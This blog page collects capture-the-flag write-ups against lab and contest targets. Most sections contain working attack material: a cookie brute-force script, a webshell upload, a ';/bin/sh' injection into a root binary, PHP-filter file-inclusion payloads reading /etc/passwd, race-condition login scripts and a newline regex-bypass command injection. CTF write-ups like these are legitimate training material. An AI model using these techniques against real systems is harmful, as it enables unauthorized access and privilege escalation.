Kerz's Penetration Test.: Writeup

Showing posts with label Writeup. Show all posts

Saturday, 28 August 2021

[HTB] Oopsie

I could see 2 opened ports which are port 22 and 80.

$ sudo nmap -PS -sS 10.10.10.28 -sC

Nmap scan report for 10.10.10.28

Host is up (0.68s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

| ssh-hostkey:

| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)

| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)

|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)

80/tcp open http

|_http-title: Welcome

There was not a login page, or no feature.

There was another directory with view-source.

I could found 2 important information.

1. /cdn-cgi/login/login.php

2. /uploads/

I should keep the 2nd directory information, it will be useful information later.

I could see a login page.

The account was admin and password was "MEGACORP_4dm1n!!". The password was from the previous box.

I could see some menus and my cookie. The cookie was "user=34322; role=admin".

The uploads menu showed an error message "This action require super admin rights".

So, I should gain the super admin right. I changed the user number of the cookie.

import requests
from bs4 import BeautifulSoup

def exp():
    host, port = "http://10.10.10.28", 80
    for i in range(86574, 100000):
        cookies = {
                "user":str(i),
                "role":"admin"
                }

        r = requests.get(host+"/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
        if "Authenticating" not in r.text:
            print(f"Found: {str(i)}")
            exit()

if __name__ == "__main__":
    exp()

I found the user number to access the uploads menu.

I generated a webshell using weevely.

There was a user account and password.

I could access the box with SSH with the robert's credentials. I got the user flag.

Next, I should gain a root permission. I looked forward other vulnerabilities.

After few mintues, I checked a suspicous group name "bugtracker".

I found the suspicous binary /usr/bin/bugtracker.

- find / -type f -group kali 2>/dev/null

It runs with root permission.

I got the root permission after I put ";/bin/sh".

END

Tuesday, 24 August 2021

corCTF - writeup for crypto/fibinary

It is a simple crypto chall.

It provides below code and encrypted flag:

enc.py

fib = [1, 1]

for i in range(2, 11):

fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):

n = ord(c)

b = ''

for i in range(10, -1, -1):

if n >= fib[i]:

n -= fib[i]

b += '1'

else:

b += '0'

return b

flag = open('flag.txt', 'r').read()

enc = ''

for c in flag:

enc += c2f(c) + ' '

with open('flag.enc', 'w') as f:

f.write(enc.strip())

flag.enc

10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 00101001010 10000101000 10100000100 00000100100

I made simple brute-force code to decrypt the encrypted flag.

dec.py

fib = [1, 1]

for i in range(2, 11):

fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):

n = ord(c)

b = ''

for i in range(10, -1, -1):

if n >= fib[i]:

n -= fib[i]

b += '1'

else:

b += '0'

return b

flag_enc = open('flag.enc', 'r').read()

dec = ''

for flag_blk in flag_enc.split(' '):

for c in range(0,127):

if c2f(chr(c)) == flag_blk:

dec += chr(c)

print(dec)

Flag:

corctf{b4s3d_4nd_f1bp!113d}

Tuesday, 7 January 2020

WhiteHat Grand Prix 06 – Quals, CTF writeup, Web Security 1

In the task, I got a website with register, login, logout forms. The web site redirected to:

http://15.165.80.50/?page=login
http://15.165.80.50/?page=logout

After a while I figured out that the page parameter's value was vulnerable, which I was able to read local files using php wrapper LFI. For example:

http://15.165.80.50/?page=php://filter/convert.base64-encode/resource=/etc/passwd

I used the above payload to read the website's files such as index.php, however, it did not work. I wasted my time guessing the path and file name of the web files and a flag.

I checked some files to gain some information in /proc and other directories. The flag was in /proc/1/cmdline.

$ curl http://15.165.80.50/?page=php://filter/convert.base64-encode/resource=/proc/1/cmdline -o a.txt

$ cat a.txt

<!DOCTYPE html>
<html lang="en">
<head>
<title>My Viet Nam</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
<style type="text/css">
body{ font: 14px sans-serif; }
.wrapper{ width: 350px; padding: 20px; }
</style>
</head>
<body>

<nav class="navbar navbar-inverse">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">My Viet Nam</a>
</div>

<ul class="nav navbar-nav">
<li class="active"><a href="/">Home</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="?page=register"><span class="glyphicon glyphicon-user"></span> Register</a></li>
<ll><a href="?page=login"><span class="glyphicon glyphicon-log-in"></span> Login</a></li>
</ul>
</div>
</nav>/bin/bash/bin/start_service WhiteHat{Local_File_Inclusion_bad_enough_??}

The flag was WhiteHat{Local_File_Inclusion_bad_enough_??}.

Monday, 15 April 2019

PlaidCTF 2019 - Triggered (Web)

I was not able to solve this problem on the contest time. Someone posted hint on Twitter Link#, I solved as per his poster, but he did not post with detail information. Therefore, I wrote code and found a flag as per below:

Problem Description

Triggered - Web (280 pts)

I stared into the abyss of microservices, and it stared back. I found something utterly terrifying about the chaos of connections.

"Screw this," I finally declared, "why have multiple services when the database can do everything just fine on its own?"

And so on that glorious day it came to be that everything ran in plpgsql.

Write up

Below codes should run at same time due to race condition exploit.

First Code:

1:  import requests  
2:    
3:  def request_post(url, cookies, data):  
4:    r = requests.post(url, cookies=cookies, data=data)  
5:    if r.url == "http://triggered.pwni.ng:52856/search":  
6:      if "Hey there, admin" in r.text:  
7:        print r.text  
8:        print "[-] Result: Found out!"  
9:        exit()  
10:    return r  
11:    
12:  def signin():  
13:    #signin  
14:    data = {'username':'searchtheflag'}  
15:    url = "http://triggered.pwni.ng:52856/login"  
16:    request_post(url, cookies, data)  
17:    data = {'password':'test'}  
18:    url = "http://triggered.pwni.ng:52856/login/password"  
19:    request_post(url, cookies, data)  
20:    print "[-] Sign-in: Okay"  
21:    
22:  if __name__ == "__main__":  
23:    cookies = {  
24:    'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"  
25:    }  
26:    signin()  
27:    while True:  
28:      #searchflag  
29:      data = {'query':'flag'}  
30:      url = "http://triggered.pwni.ng:52856/search"  
31:      r = request_post(url, cookies, data)  
32:      print "[-] Search: in progress"  
33:      if (r.url == "http://triggered.pwni.ng:52856/login"):  
34:        signin()  
35:

Second Code:

1:  import requests, time  
2:    
3:  def request_post(url, cookies, data):  
4:    r = requests.post(url, cookies=cookies, data=data)  
5:    return r  
6:    
7:  def signin_admin(cookies):  
8:    data = {'username':'admin'}  
9:    url = 'http://triggered.pwni.ng:52856/login'  
10:    request_post(url, cookies, data)  
11:    
12:  if __name__ == "__main__":  
13:    cookies = {  
14:      'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"  #your session
15:    }  
16:    while True:  
17:      signin_admin(cookies)  
18:

Result & Flag:

1:  [-] Sign-in: Okay  
2:  [-] Search: in progress  
3:  [-] Search: in progress  
4:  [-] Search: in progress  
5:  [-] Search: in progress  
6:  [-] Search: in progress  
7:  [-] Search: in progress  
8:  [-] Search: in progress  
9:  [-] Search: in progress  
10:  [-] Search: in progress  
11:  [-] Search: in progress  
12:  [-] Search: in progress  
13:  [-] Sign-in: Okay  
14:  [-] Search: in progress  
15:  [-] Sign-in: Okay  
16:  [-] Search: in progress  
17:  [-] Sign-in: Okay  
18:  [-] Search: in progress  
19:  [-] Sign-in: Okay  
20:  [-] Search: in progress  
21:  [-] Sign-in: Okay  
22:  [-] Search: in progress  
23:  [-] Sign-in: Okay  
24:  [-] Search: in progress  
25:  [-] Sign-in: Okay  
26:  [-] Search: in progress  
27:  [-] Sign-in: Okay  
28:  [-] Search: in progress  
29:  [-] Sign-in: Okay  
30:  [-] Search: in progress  
31:  [-] Sign-in: Okay  
32:  [-] Search: in progress  
33:  [-] Sign-in: Okay  
34:  [-] Search: in progress  
35:  [-] Sign-in: Okay  
36:  [-] Search: in progress  
37:  [-] Sign-in: Okay  
38:  [-] Search: in progress  
39:  [-] Sign-in: Okay  
40:  [-] Search: in progress  
41:  [-] Sign-in: Okay  
42:  [-] Search: in progress  
43:  [-] Sign-in: Okay  
44:  [-] Search: in progress  
45:  [-] Sign-in: Okay  
46:  [-] Search: in progress  
47:  [-] Sign-in: Okay  
48:  [-] Search: in progress  
49:  [-] Sign-in: Okay  
50:  [-] Search: in progress  
51:  [-] Sign-in: Okay  
52:  [-] Search: in progress  
53:  [-] Sign-in: Okay  
54:  <html>  
55:  <head>  
56:      <link rel="stylesheet" href="/static/styles.css" />  
57:      <link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">  
58:  </head>  
59:  <body>  
60:      <header>  
61:          <a href="/" class="left">  
62:              <h1>pgNotes</h1>  
63:              <h2>Let's keep it PG, ok?</h2>  
64:          </a>  
65:          <div class="right">  
66:    
67:                  <nav>  
68:                      <div class="welcome">Hey there, admin</div>  
69:                      &middot;  
70:                      <a href="/search">Search notes</a>  
71:                      &middot;  
72:                      <a href="/note/new">New note</a>  
73:                      &middot;  
74:                      <a href="/logout">Logout</a>  
75:                  </nav>  
76:    
77:          </div>  
78:      </header>  
79:      <main>  
80:  <section class="search-input">  
81:      <h3>Search</h3>  
82:      <form method="POST" action="/search">  
83:          <div class="input">  
84:              <label>Query</label>  
85:              <input type="text" name="query" />  
86:          </div>  
87:          <div class="input submit">  
88:              <input type="submit" />  
89:          </div>  
90:      </form>  
91:  </section>  
92:    
93:      <section class="search-query">  
94:          Results for <span class="query">flag</span>  
95:      </section>  
96:    
97:    
98:              <section class="note">  
99:      <section class="header">  
100:          <h4>Flag</h4>  
101:          <div class="author">admin</div>  
102:          <div class="date">02:44pm on April   13, 2019</div>  
103:      </section>  
104:      <section class="content">  
105:          <p>  
106:              PCTF{i_rAt3_p0sTgRE5_1O_oUT_0f_14_pH_n3ed5_m0Re_4Cid}  
107:          </p>  
108:      </section>  
109:  </section>  
110:    
111:              <section class="note">  
112:      <section class="header">  
113:          <h4>flag</h4>  
114:          <div class="author">admin</div>  
115:          <div class="date">08:11am on April   14, 2019</div>  
116:      </section>  
117:      <section class="content">  
118:          <p>  
119:              PCTF{cr4zy_70_m4k3_w3b_4ppl1c4710n_w17h_plp65ql}  
120:          </p>  
121:      </section>  
122:  </section>  
123:    
124:              <section class="note">  
125:      <section class="header">  
126:          <h4>flag</h4>  
127:          <div class="author">admin</div>  
128:          <div class="date">04:51pm on April   14, 2019</div>  
129:      </section>  
130:      <section class="content">  
131:          <p>  
132:              PCTF{PsQl_w3bs3rv3rf0rh1pst3r_l0l}  
133:          </p>  
134:      </section>  
135:  </section>  
136:    
137:              <section class="note">  
138:      <section class="header">  
139:          <h4>Flag</h4>  
140:          <div class="author">admin</div>  
141:          <div class="date">06:55pm on April   14, 2019</div>  
142:      </section>  
143:      <section class="content">  
144:          <p>  
145:              PCTF{pGn0Te2_Lets_k22P_1t_PG_oK}  
146:          </p>  
147:      </section>  
148:  </section>  
149:    
150:    
151:    
152:      </main>  
153:  </body>  
154:  </html>  
155:  [-] Result: Found out!

Thanks @gP4yload

Monday, 22 February 2016

Internetwache 2016 EXP50 Writeup

When I access the server ;188.166.133.53:12037.
It shows "Let me count the ascii values of 10 characters:".
I just input some text such as "test", Then it shows an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"

The Ruby has a vulnerability of regex. I code to get a Flag.

 import socket  
   
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 s.connect(('188.166.133.53', 12037))  
   
 print s.recv(1024)  
 print s.recv(1024)  
 s.send('ls\naaaaaaaaaa')  
 print s.recv(1024)  
 s.close()

Then, the server returns as below:

$ python test.py
Let me count the ascii values of 10 characters:

Sum is: 1203
IW{RUBY_R3G3X_F41L}

FLAG:
IW{RUBY_R3G3X_F41L}

Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html